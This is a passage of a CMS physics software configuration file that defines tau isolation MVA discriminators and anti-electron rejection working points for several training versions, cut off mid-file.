verbosity = cms.int32(0)
)
# VVLoose WP
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw'),
key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw','category'),
loadMVAfromDB = cms.bool(True),
mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_mvaOutput_normalization"), # normalization fo the training you want to use
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff95"), # this is the name of the working point you want to use
variable = cms.string("pt"),
)
)
)
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff50")
# VVTights WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff40")
# MVAIso DBoldDM Seqeunce
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTSeq = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw
+ patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT
+ patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT
)
## DBnewDM
# Raw
patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
loadMVAfromDB = cms.bool(True),
mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2"), # name of the training you want to use
mvaOpt = cms.string("DBnewDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
verbosity = cms.int32(0)
)
# VVLoose WP
patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw'),
key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw','category'),
loadMVAfromDB = cms.bool(True),
mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_mvaOutput_normalization"), # normalization fo the training you want to use
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff95"), # this is the name of the working point you want to use
variable = cms.string("pt"),
)
)
)
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff50")
# VVTights WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff40")
# MVAIso DBnewDM Seqeunce
patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTSeq = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw
+ patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT
+ patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT
)
## DBoldDMdR0p3
# Raw
patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
loadMVAfromDB = cms.bool(True),
mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2"), # name of the training you want to use
mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
srcChargedIsoPtSum = cms.string('chargedIsoPtSumdR03'),
srcFootprintCorrection = cms.string('footprintCorrectiondR03'),
srcNeutralIsoPtSum = cms.string('neutralIsoPtSumdR03'),
srcPUcorrPtSum = cms.string('puCorrPtSum'),
srcPhotonPtSumOutsideSignalCone = cms.string('photonPtSumOutsideSignalConedR03'),
verbosity = cms.int32(0)
)
# VVLoose WP
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw'),
key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw','category'),
loadMVAfromDB = cms.bool(True),
mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_mvaOutput_normalization"), # normalization fo the training you want to use
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff95"), # this is the name of the working point you want to use
variable = cms.string("pt"),
)
)
)
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff50")
# VVTights WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff40")
# MVAIso DBoldDMdR0p3 Seqeunce
patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTSeq = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw
+ patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT
+ patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT
)
### MVAIso 2017v1 for Nano on top of MiniAODv1
## DBoldDM
# Raw
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1 = patDiscriminationByIsolationMVArun2v1raw.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
loadMVAfromDB = cms.bool(True),
mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1"), # name of the training you want to use
mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
verbosity = cms.int32(0)
)
# VVLoose WP
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patDiscriminationByIsolationMVArun2v1VLoose.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1'),
key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1','category'),
loadMVAfromDB = cms.bool(True),
mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_mvaOutput_normalization"), # normalization fo the training you want to use
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff95"), # this is the name of the working point you want to use
variable = cms.string("pt"),
)
)
)
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff50")
# VVTights WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff40")
# MVAIso DBoldDM Seqeunce
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2017v1Seq = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1
+ patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1
+ patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1
)
### MVAIso 2015 for Nano on top of MiniAODv2
## DBoldDM
# Raw
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015 = patDiscriminationByIsolationMVArun2v1raw.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
loadMVAfromDB = cms.bool(True),
mvaName = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1"), # name of the training you want to use
mvaOpt = cms.string("DBoldDMwLT"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
verbosity = cms.int32(0)
)
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015 = patDiscriminationByIsolationMVArun2v1VLoose.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015'),
key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015','category'),
loadMVAfromDB = cms.bool(True),
mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_mvaOutput_normalization"), # normalization fo the training you want to use
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff90"), # this is the name of the working point you want to use
variable = cms.string("pt"),
)
)
)
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff50")
# VVTights WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff40")
# MVAIso DBoldDM Seqeunce
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2015Seq = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015
+ patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015
+ patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015
+ patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015
+ patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015
+ patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015
+ patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015
)
### Define new anit-e discriminants
antiElectronDiscrMVA6_version = "MVA6v3_noeveto"
## Raw
from RecoTauTag.RecoTau.PATTauDiscriminationAgainstElectronMVA6_cfi import patTauDiscriminationAgainstElectronMVA6
from RecoTauTag.RecoTau.TauDiscriminatorTools import noPrediscriminants
patTauDiscriminationByElectronRejectionMVA62018Raw = patTauDiscriminationAgainstElectronMVA6.clone(
Prediscriminants = noPrediscriminants, #already selected for MiniAOD
vetoEcalCracks = False, #keep tau candidates in EB-EE cracks
mvaName_NoEleMatch_wGwoGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL',
mvaName_NoEleMatch_wGwoGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC',
mvaName_NoEleMatch_woGwoGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL',
mvaName_NoEleMatch_woGwoGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC',
mvaName_wGwGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL',
mvaName_wGwGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC',
mvaName_woGwGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL',
mvaName_woGwGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC'
)
## anti-e 2018 WPs
from RecoTauTag.RecoTau.PATTauDiscriminantCutMultiplexer_cfi import patTauDiscriminantCutMultiplexer
# VLoose
patTauDiscriminationByVLooseElectronRejectionMVA62018 = patTauDiscriminantCutMultiplexer.clone(
PATTauProducer = patTauDiscriminationByElectronRejectionMVA62018Raw.PATTauProducer,
Prediscriminants = patTauDiscriminationByElectronRejectionMVA62018Raw.Prediscriminants,
toMultiplex = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw"),
key = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw","category"),
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(2),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(5),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(7),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(8),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(10),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(13),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff98'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(15),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff98'),
variable = cms.string('pt')
)
)
)
# Loose
patTauDiscriminationByLooseElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(2),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(5),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(7),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(8),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(10),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(13),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff90'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(15),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff90'),
variable = cms.string('pt')
)
)
)
# Medium
patTauDiscriminationByMediumElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(2),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(5),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(7),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(8),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(10),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(13),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff80'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(15),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff80'),
variable = cms.string('pt')
)
)
)
# Tight
patTauDiscriminationByTightElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(2),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(5),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(7),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(8),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(10),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(13),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff70'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(15),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff70'),
variable = cms.string('pt')
)
)
)
# VTight
